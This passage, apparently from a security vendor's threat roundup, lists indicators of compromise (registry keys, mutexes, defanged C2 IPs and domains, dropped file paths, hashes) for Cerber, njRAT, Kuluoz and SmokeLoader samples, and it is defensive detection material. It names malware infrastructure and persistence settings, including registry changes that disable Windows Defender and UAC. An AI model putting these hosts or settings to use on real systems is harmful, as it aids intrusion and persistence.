dec2f3b1b9b450843c1a9a4e8a368b325356f13ab1460ee3591525aae651e3d7 eb8c433674c2ae7030f0eca0bc639abb7f9dc79077cd1be6734edc31f6208a26 ef4c0401795082d5ac654c97254401435d2f844c80cdf4b9ed4ac1601ac37061 f5aae66779652b5b4abfe575f5d7f9c1f57deb2127a21e6031b01c16b148ccee `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-d9i_o-MOJ78/XjR_idkKGBI/AAAAAAAADMs/bNvOFS0S8EYNGhomca50M2qmNKLCgj6BQCLcBGAsYHQ/s1600/c2d69d1b4e4977cbc97108ca5818e6fcfed517f3480b441726d6f75ac7962d84_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-2wsyxKuEQPE/XjR_lTYkUHI/AAAAAAAADM0/aL_YXMclYekKeYpnAw9C6s6jA2eehLumwCLcBGAsYHQ/s1600/c2d69d1b4e4977cbc97108ca5818e6fcfed517f3480b441726d6f75ac7962d84_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Cerber-7561026-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\SPEECH\\VOICES \nValue Name: DefaultTokenId ` | 19 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\SPEECH\\VOICES ` | 19 \nMutexes | Occurrences \n---|--- \n`shell.{381828AA-8B28-3374-1B67-35680555C5EF}` | 25 \n`shell.{<random GUID>}` | 25 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`31[.]184[.]234[.]0/25` | 25 \n`104[.]20[.]20[.]251` | 8 \n`104[.]20[.]21[.]251` | 6 \n`104[.]24[.]104[.]254` | 4 \n`104[.]24[.]105[.]254` | 3 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`en[.]wikipedia[.]org` | 19 \n`www[.]collectionscanada[.]ca` | 19 \n`alpha3[.]suffolk[.]lib[.]ny[.]us` | 19 \n`www[.]archives[.]gov` | 19 \n`www[.]vitalrec[.]com` | 19 \n`www[.]cdc[.]gov` | 19 \n`api[.]blockcypher[.]com` | 10 \n`btc[.]blockr[.]io` | 10 \n`chain[.]so` | 7 \n`xxxxxxxxxxxxxxxx[.]xxxxxxxxxxxx[.]xxx` | 2 \n`vyohacxzoue32vvk[.]v0xn1i[.]bid` | 1 \n`vyohacxzoue32vvk[.]7jrv53[.]bid` | 1 \n`vyohacxzoue32vvk[.]jtdcph[.]bid` | 1 \n`vyohacxzoue32vvk[.]lpnef4[.]bid` | 1 \n`vyohacxzoue32vvk[.]patchmans[.]gdn` | 1 \n`vyohacxzoue32vvk[.]8g1k17[.]bid` | 1 \n`vyohacxzoue32vvk[.]goodslet[.]win` | 1 \n`vyohacxzoue32vvk[.]23fvxw[.]bid` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\d19ab989\\4710.tmp` | 25 \n`%TEMP%\\d19ab989\\a35f.tmp` | 25 \n`\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\README.hta` | 20 \n`%ProgramFiles(x86)%\\Microsoft Office\\Templates\\1033\\ONENOTE\\14\\Stationery\\README.hta` | 20 \n`%APPDATA%\\Microsoft\\Access\\README.hta` | 20 \n`%APPDATA%\\Microsoft\\Outlook\\README.hta` | 20 \n`%HOMEPATH%\\Desktop\\README.hta` | 20 \n`%HOMEPATH%\\Documents\\Outlook Files\\README.hta` | 20 \n`%HOMEPATH%\\Contacts\\README.hta` | 19 \n`%TEMP%\\tmp<random, matching [A-F0-9]{1,4}>.bmp` | 19 \n`%APPDATA%\\Adobe\\Acrobat\\9.0\\README.hta` | 16 \n`<dir>\\<random, matching [A-Z0-9\\-]{10}.[A-F0-9]{4}> (copy)` | 10 \n \n#### File Hashes\n\n` 000315b74577c50c57b6572c33312f1911d3d55df50674a87ee95d88a3c0b1b2 011b56e8a271ce8853e3f3e61079c2f62ceab0424a2995fdb3c3f165d2e48666 016aecdd057f2a3881726fde3b86d252062b8891d37822b0dd48ba62ee258dbf 01a0d960c7d6cae948631473f5b39c85b490c83a362d1eeb5f36a5908127389f 040587bdd329f4db15db6f24162691421069e38324b38275449db69ac2cf2029 0430c8f48d38780eba6e1d1b31a80b9c27f3c2bc5507cee74f352546ef07fe7a 0458432198b913f1bf1180e489186297d510550ce908e1dae163a7163a7ade3f 04b76f05a328d0c650141e82da5dbecb4b8d6f0c9c1c7ad83fd111c1f915a0cc 08561dd16308a0871e531a56e834ef0feeafff902901ef7114f5901ee68735db 09172c06a88ed355a772a24f06657e126809dbd61d4b1dda3ad274fb6c7b28fa 0d6c99690789fb5c3a8f8e9f384a34e9da251533910e89df6fcd9098c5edc042 0d909f449bc71cf5ff20077c20215f0b0b358b9f7c1f6baea8fd0592e376248f 0e2aa56da62c5a9bddef4a0162ad5522b0530d2470a0aa9c39ef2c781c0f3672 0fc0d6c7c8b0661db73de058f1f30432d4fef0670dcf5a2f9416f7e2c723cfd1 0fea5d0606a587c7bfb985fbd896ac6cb4fcd6663538a8a5d1760a3171380834 1025c58e7ffef3535b7fb89a900ee09cfecfd11af644f0f5155a832dafd9a02c 1142746bc626e5ee64430de62de2b1383f193d84f4b7044ab67236c427600099 1658371db7a7e52a191522322cda7fe93d093b54e2e8cba65a5adae91a3f5bf1 17ff4c8f632ca8e4a9200e9a68f46a6d3440cac2dd7c8c4e8e1698291e8c7cd1 18192e9bffb8e02b8a3c7540f0d33d14d0f49464adaec86d86f5477a55694eb0 19f56bfaf4437ae7fc227ad695d16adc7d94a91ebf092cbac0e406e421d7c48a 1a1378b871bb6d0a00fe3c6e151d5510f28d92b00ed87031916247b91e13a216 1b7962b03eb0e7fb25f9f31d20d263e3ef6603623f8e0efc94a91a00f9b1b3f1 1bf19b2a823abd555002380c9fc5fc932c2e66826d1c949ac96050d51924ab41 1c018281e339f735fde9edb9180f3f08181f34226aefd3d43d8de6874bdd77c4 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-kK3VjA1P974/XjSC3fogBEI/AAAAAAAADNE/Z1sNrFRlN4cihHpih8dvo51-T6-VXYWOQCLcBGAsYHQ/s1600/1b7962b03eb0e7fb25f9f31d20d263e3ef6603623f8e0efc94a91a00f9b1b3f1_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-do4BTODdQjI/XjSC6zoggEI/AAAAAAAADNI/qXuK8NEewnwbWv0sr3ijlc-sLOSlZH0bQCLcBGAsYHQ/s1600/1b7962b03eb0e7fb25f9f31d20d263e3ef6603623f8e0efc94a91a00f9b1b3f1_tg.png>)\n\n \n\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.njRAT-7561028-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\ENVIRONMENT \nValue Name: SEE_MASK_NOZONECHECKS ` | 15 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON \nValue Name: ParseAutoexec ` | 15 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 5cd8f17f4086744065eb0992a09e05a2 ` | 3 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 5cd8f17f4086744065eb0992a09e05a2 ` | 3 \n`<HKCU>\\SOFTWARE\\C2405709A54EC95CDDCC5C598F34081C ` | 3 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: c2405709a54ec95cddcc5c598f34081c ` | 3 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: c2405709a54ec95cddcc5c598f34081c ` | 3 \n`<HKCU>\\SOFTWARE\\C2405709A54EC95CDDCC5C598F34081C \nValue Name: [kl] ` | 3 \n`<HKCU>\\SOFTWARE\\61EA4210CF20153E16C66B613536B9E0 ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 61ea4210cf20153e16c66b613536b9e0 ` | 2 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 61ea4210cf20153e16c66b613536b9e0 ` | 2 \n`<HKCU>\\SOFTWARE\\61EA4210CF20153E16C66B613536B9E0 \nValue Name: [kl] ` | 2 \n`<HKCU>\\SOFTWARE\\C550D26EE8BEBB2D926652BE861588B2 ` | 2 \n`<HKCU>\\SOFTWARE\\C550D26EE8BEBB2D926652BE861588B2 \nValue Name: hp ` | 2 \n`<HKCU>\\SOFTWARE\\C550D26EE8BEBB2D926652BE861588B2 \nValue Name: i ` | 2 \n`<HKCU>\\SOFTWARE\\C550D26EE8BEBB2D926652BE861588B2 \nValue Name: kl ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: c550d26ee8bebb2d926652be861588b2 ` | 2 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: c550d26ee8bebb2d926652be861588b2 ` | 2 \n`<HKCU>\\SOFTWARE\\ADOBE\\ACROBAT READER\\9.0\\AVGENERAL \nValue Name: bLastExitNormal ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: f8782a013a20610e09216f21b705d856 ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: f8782a013a20610e09216f21b705d856 ` | 1 \n`<HKCU>\\SOFTWARE\\F8782A013A20610E09216F21B705D856 \nValue Name: [kl] ` | 1 \n`<HKCR>\\LOCAL SETTINGS\\SOFTWARE\\MICROSOFT\\WINDOWS\\SHELL\\MUICACHE \nValue Name: C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoViewer.dll ` | 1 \n`<HKCR>\\LOCAL SETTINGS\\SOFTWARE\\MICROSOFT\\WINDOWS\\SHELL\\MUICACHE \nValue Name: C:\\Program Files (x86)\\Windows NT\\Accessories\\WORDPAD.EXE ` | 1 \n`<HKCU>\\SOFTWARE\\A283D5EDA9CD874157ADF0AF127AFD04 \nValue Name: hp ` | 1 \nMutexes | Occurrences \n---|--- \n`<32 random hex characters>` | 11 \n`5cd8f17f4086744065eb0992a09e05a2` | 3 \n`c550d26ee8bebb2d926652be861588b2SGFjS2Vk` | 2 \n`Acrobat Instance Mutex` | 1 \n`a283d5eda9cd874157adf0af127afd04SGFjS2Vk` | 1 \n`2AC1A572DB6944B0A65C38C4140AF2F44d472337468` | 1 \n`2AC1A572DB6944B0A65C38C4140AF2F44d472337490` | 1 \n`2AC1A572DB6944B0A65C38C4140AF2F44d4723374A4` | 1 \n`2AC1A572DB6944B0A65C38C4140AF2F44d4723374CC` | 1 \n`2AC1A572DB6944B0A65C38C4140AF2F44d47233758C` | 1 \n`2AC1A572DB6944B0A65C38C4140AF2F44d4723376DC` | 1 \n`2AC1A572DB6944B0A65C38C4140AF2F44d472337710` | 1 \n`2AC1A572DB6944B0A65C38C4140AF2F44d472337750` | 1 \n`2AC1A572DB6944B0A65C38C4140AF2F44d472337828` | 1 \n`2AC1A572DB6944B0A65C38C4140AF2F44d4723378B0` | 1 \n`2AC1A572DB6944B0A65C38C4140AF2F44d473EA6134` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`156[.]216[.]33[.]12` | 1 \n`141[.]255[.]152[.]56` | 1 \n`141[.]255[.]153[.]212` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`imaneblueyes[.]ddns[.]net` | 2 \n`mestry1212[.]ddns[.]net` | 2 \n`amrfarag[.]ddns[.]net` | 1 \n`njs1[.]ddns[.]net` | 1 \n`emlpesa[.]ddns[.]net` | 1 \n`facebock[.]ddns[.]net` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\server.exe` | 4 \n`%TEMP%\\Trojan.exe` | 3 \n`%TEMP%\\Trojan.exe.tmp` | 3 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\c2405709a54ec95cddcc5c598f34081c.exe` | 3 \n`%TEMP%\\Chrom.exe` | 3 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\c550d26ee8bebb2d926652be861588b2.exe` | 2 \n`%APPDATA%\\Adobe\\Acrobat\\9.0\\AdobeCMapFnt09.lst` | 1 \n`%APPDATA%\\Adobe\\Acrobat\\9.0\\SharedDataEvents` | 1 \n`%APPDATA%\\Adobe\\Acrobat\\9.0\\UserCache.bin` | 1 \n`%LOCALAPPDATA%\\Adobe\\Acrobat\\9.0\\Cache\\AcroFnt09.lst` | 1 \n`%APPDATA%\\Adobe\\Acrobat\\9.0\\SharedDataEvents-journal` | 1 \n`%APPDATA%\\Microsoft.exe` | 1 \n`%TEMP%\\Windows` | 1 \n`%TEMP%\\Windows Update.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\f8782a013a20610e09216f21b705d856.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\9de3566e57ab5f0665456e9f5754a7d3.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\2f08ade869f075aa32331d77d03e57e5.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\77ca5176ec9da801e6934f1f927759d5.exe` | 1 \n \n#### File Hashes\n\n` 186dae58f108dac74fd244a34d8a508232ae314301992e52a166c2e6f82e50e3 28fa81e67c51b9ba0c71dde4b5ad4df0d3314f81deef202492be2d85a4af6c05 3335c86b6906fc3f0fc3ada7dec5fde0c10be9e8b0c20f9fe8719f2c54ff277b 41d83b4ddf1b6861b2f7b5f3fd949f208cd0bdd96966217c61b5d5ea45c3a1c4 488864edfd3a995a2733f842bdf18cdf638b1f03563fc1959da6b04c719f09d9 6e25e2b859bf13299c0c116bf94bd86ea97c470aada3fa94bc2a4522ca1a471b 70b10d403f814d4bc94e0fdaf9584563d47bb36d72a1afce40cfd0ebec1eafd9 7274ef9fd2c4bab07a9a3ca46fb0f4b37107748fb9d8632e27faeba6be597b46 77149e99944db0ebe0c44bee046dad27529a104c6b9214973fba67f707bb3566 7cf3348c2711766f5ef2222a3cc74033fa08577a023f4e69fd921acc50810fa8 a0e50a68677941f3b7e68f9d32e4d1e014dac945a2e01f6bb823e58adeb7ec09 aa74ffa3991bf176f7d9eca8da00f379f735bd2d3acd7e9dd74fc041bbf84d01 c10cfd2c2141fa2d49f0d6f1238e844b51ed3381f6c63fed03792ec90a198fce c1938290fa67d53419918fec56e9f2ee07627fd0f8c279fa7f13357c624041e7 e3b41f2a9223a9531b94c257cba97ecd5b075a04523e5f19c9bb07396097a99a f0d1321a4f4774b87d74b8d5a18be28d3dae01361f0d28be599e7bb955a140f8 fc6b24794dd8168be2adc39d831cd18ea43f7cd9e91942228df5fc70606c509e `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-tG2uI9opyTk/XjSDQ5m-myI/AAAAAAAADNc/NkqvmKyZbO8gkeoXFOH1wp3aueQpOmXwACLcBGAsYHQ/s1600/7cf3348c2711766f5ef2222a3cc74033fa08577a023f4e69fd921acc50810fa8_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-ct8r4BwFvwE/XjSDdsWsbAI/AAAAAAAADNg/nWdA30YxEGg5xGJqC4wkKy3twoj32XZLACLcBGAsYHQ/s1600/7cf3348c2711766f5ef2222a3cc74033fa08577a023f4e69fd921acc50810fa8_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.Kuluoz-7561668-1\n\n#### Indicators of Compromise\n\nMutexes | Occurrences \n---|--- \n`2GVWNQJz1` | 25 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`69[.]93[.]231[.]252` | 18 \n`149[.]154[.]154[.]249` | 18 \n`88[.]190[.]226[.]223` | 17 \n`31[.]47[.]250[.]41` | 16 \n`83[.]141[.]7[.]102` | 12 \n`50[.]56[.]124[.]35` | 10 \nFiles and or directories created | Occurrences \n---|--- \n`%LOCALAPPDATA%\\<random, matching '[a-z]{8}'>.exe` | 25 \n`%HOMEPATH%\\Local Settings\\Application Data\\tffgswtx.exe` | 3 \n`%HOMEPATH%\\Local Settings\\Application Data\\uhqbtmne.exe` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\tmdejqpr.exe` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\gesansxj.exe` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\xfddgijv.exe` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\sqslklnf.exe` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\krkswwef.exe` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\blvvvbjt.exe` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\uswhecuu.exe` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\stterjid.exe` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\xuxivago.exe` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\vhhvooxa.exe` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\tqknmmob.exe` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\pnitjnpg.exe` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\tjucsrwv.exe` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\fidbhpbb.exe` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\qpuokdjt.exe` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\mpwshjgw.exe` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\uhpeqlrs.exe` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\elsmwsrf.exe` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\kwfdmcme.exe` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\egcnjpnc.exe` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\ntftgptb.exe` | 1 \n \n#### File Hashes\n\n` 0108740d41c4f9f055e365a2f69b297ce9c10c8bb1ba0de30bbf5d65dcb60c2c 012082d16c60291c94e03aad79d7363ee6500ddd1e775487960565977d3c87b9 02fba64a3b71a5ac96e3d827c8d38cce63a252d2e3569adbfef99910cdfadc51 0527a40a7d8fff9c7fcd999e746f484156c66714d2fbcce5fd3215de4ec89f05 0549b4e372310c856e724a3afc638e4e94b4faaf5d947dc7e517e6f84eff312f 060620d8e4038d2705cf20ae625a8b5eb23e4888b51ad0f7cbd7adf68d7deef2 061f8f8125741ed3271cd34d2b7a58bb92affbd4d652e332f5c8c26ee55883ee 06288e899058ab5d7773b7353f66565545a8feba7380b121d80112bbe0453d30 0696d337aa0b00ca9a22cd1f934fc7ea7cb4591073dc97bbc90263d9dcb5b232 078c9cfcab1871f10a2f8168a18f40dd5c90d7900f82ba73c16bd2425fee430e 093285215d738a1b2f5e66ace61ff34e561b3a941e664b1e2c583bc9392b57e8 09b48bfc7ad57b3d7924ed422defdfc9218c3c2b592e56b5c25a9faf1058d716 0a0e1e0ba5bc50ae1b4d83c4993c79abc783a3962f101516ef7c046d5d261697 0a9a6045b22468d1f35fe939f00318f841b26ebc4491d77e90c4d861902987ff 0b13ffc85de1b3e09f9850d010c85e64b4daa77f6acbfdf334b9126726fcf81f 0b516d370bd6e32d4e1f34c9119dbcd85ed302ff13abeb2433ac0c8fc97fb874 0ba092f829fa1a6d4a407c80b3032ae15b55a6a2bc4881e23fe1b2087d55bfd0 0c1b0a0154c6f83a96a949e26f42086af5bfaf2ad7c6cda273ae8d72c6412373 0c3a114fa273a56b3298ac93d7ee8358dcf6f16948b6ed7deaacec4eaef51860 0c4ae1b251bfed96d1e8eea56d618d35a56a6a0fe33ca76da299ed6232bf10da 0c88e57f1814b0bf3c5cd6520c368f4d7b3332614493d6fe87c280f6719ff6a3 0d6e734a8f3144b5fb657501546386535b86baec473f299857241a3b302cd320 0de30c8bd2a81c1a88cf936c811d36be0680c206d93a176351bb9bd92da48c7b 0e2d908f734e728e9cd08d696533004abf1723991541f687fa540352ef032c35 0ff08927fc2e34a84b9ce4cedb70a728b30c2babfd7aeeedd35769f1f0aeb6b3 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-OSbT7NdjF6E/XjSEd5FmZCI/AAAAAAAADNw/WcXI_7ozqtQ7hzh3aK3SaIiqqG6zDkxiwCLcBGAsYHQ/s1600/078c9cfcab1871f10a2f8168a18f40dd5c90d7900f82ba73c16bd2425fee430e_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-VmlE7uFrjig/XjSEiBiRqnI/AAAAAAAADN0/O6dEhUhfTG8wWeorN1DStvNNSwJ4zdB9QCLcBGAsYHQ/s1600/078c9cfcab1871f10a2f8168a18f40dd5c90d7900f82ba73c16bd2425fee430e_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Trojan.SmokeLoader-7562031-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\LOCAL APPWIZARD-GENERATED APPLICATIONS ` | 22 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN ` | 8 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: Hidden ` | 7 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM \nValue Name: EnableLUA ` | 7 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: Start ` | 7 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINDEFEND \nValue Name: Start ` | 7 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: ShowSuperHidden ` | 7 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS \nValue Name: Start ` | 7 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MPSSVC \nValue Name: Start ` | 7 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WUAUSERV \nValue Name: Start ` | 7 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: TaskbarNoNotification ` | 7 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: TaskbarNoNotification ` | 7 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: HideSCAHealth ` | 7 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: HideSCAHealth ` | 7 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN ` | 7 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: 2827271685 ` | 7 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 2827271685 ` | 5 \n`<HKCU>\\SOFTWARE\\WINRAR ` | 2 \n`<HKLM>\\SAM\\SAM\\DOMAINS\\ACCOUNT\\USERS\\000003E9 \nValue Name: F ` | 2 \n`<HKLM>\\SAM\\SAM\\DOMAINS\\ACCOUNT\\USERS\\000001F5 \nValue Name: F ` | 2 \n`<HKCU>\\SOFTWARE\\WINRAR \nValue Name: HWID ` | 2 \n`<HKLM>\\SAM\\SAM\\DOMAINS\\ACCOUNT\\USERS\\000003EC \nValue Name: F ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Service Host Process for Windows ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: help ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: help ` | 1 \nMutexes | Occurrences \n---|--- \n`qazwsxedc` | 16 \n`04F453E614B75F818C01D1BD88F5825B98B68E3C` | 7 \n`Frz_State` | 5 \n`Local\\https://docs.microsoft.com/` | 1 \n`YAHWKKS65HAKSDJA` | 1 \n`Mutex_Y1vFO98bB6v9Q8lC815ehD1xoEvADrFwNqccccSHudZP31Qt` | 1 \n`Mutex_nLoOSZQIZqWgQsQHTpJ1ymgM69XnbNuwA89bPTRycpnppKwx` | 1 \n`2BC133F114B75F818C01D1BDA7C0E24C98B68E3C` | 1 \n`2CA90D003CEA016700C2B1832C6BBC833C28B0E4` | 1 \n`AA2A0D04BA6901638641B1872C6BBC833C28B0E4` | 1 \n`A1356D9DB17661FA8D5ED11E2C6BBC833C28B0E4` | 1 \n`7B0110536B421C34576AACD02C6BBC833C28B0E4` | 1 \n`B3CC54B3A38F58D49FA7E8302C6BBC833C28B0E4` | 1 \n`F99113FAE9D21F9DD5FAAF792C6BBC833C28B0E4` | 1 \n`0527C9131564C574294C75902C6BBC833C28B0E4` | 1 \n`12C5B9C22DB3D5B2119B6556035EDC943C28B0E4` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`204[.]79[.]197[.]203` | 8 \n`23[.]193[.]177[.]127` | 8 \n`23[.]66[.]61[.]153` | 8 \n`40[.]91[.]124[.]111` | 7 \n`40[.]90[.]247[.]210` | 7 \n`23[.]6[.]69[.]99` | 7 \n`20[.]45[.]1[.]107` | 5 \n`23[.]0[.]48[.]75` | 5 \n`23[.]13[.]211[.]142` | 4 \n`23[.]218[.]40[.]161` | 3 \n`13[.]107[.]21[.]200` | 2 \n`36[.]38[.]34[.]230` | 2 \n`40[.]112[.]72[.]205` | 2 \n`172[.]217[.]12[.]238` | 2 \n`104[.]102[.]89[.]231` | 2 \n`212[.]27[.]63[.]115` | 2 \n`23[.]0[.]209[.]167` | 2 \n`23[.]221[.]48[.]201` | 2 \n`207[.]148[.]248[.]143` | 1 \n`204[.]79[.]197[.]200` | 1 \n`184[.]105[.]192[.]2` | 1 \n`172[.]217[.]12[.]142` | 1 \n`172[.]217[.]197[.]156` | 1 \n`23[.]20[.]239[.]12` | 1 \n`40[.]76[.]4[.]15` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`m[.]googlex[.]me` | 15 \n`w[.]googlex[.]me` | 15 \n`outlook[.]com` | 8 \n`rover[.]ebay[.]com` | 8 \n`www[.]onenote[.]com` | 8 \n`www[.]msn[.]com` | 8 \n`java[.]com` | 8 \n`itunes[.]apple[.]com` | 8 \n`contextual[.]media[.]net` | 8 \n`img-s-msn-com[.]akamaized[.]net` | 8 \n`www[.]autotrader[.]com` | 8 \n`g[.]msn[.]com` | 8 \n`flights[.]msn[.]com` | 8 \n`linkmaker[.]itunes[.]apple[.]com` | 8 \n`www[.]comparecards[.]com` | 8 \n`carrentals[.]msn[.]com` | 8 \n`blog[.]msn[.]com` | 8 \n`static-global-s-msn-com[.]akamaized[.]net` | 8 \n`www[.]skype[.]com` | 8 \n`www[.]adobe[.]com` | 8 \n`www[.]fool[.]com` | 8 \n`www[.]nextadvisor[.]com` | 8 \n`e7933[.]dsca[.]akamaiedge[.]net` | 8 \n`widgets[.]tree[.]com` | 8 \n`redirect[.]viglink[.]com` | 8 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\aewefdvg` | 7 \n`%APPDATA%\\aewefdvg\\jisgivdt.exe` | 7 \n`%ProgramData%\\Media Center Programs` | 2 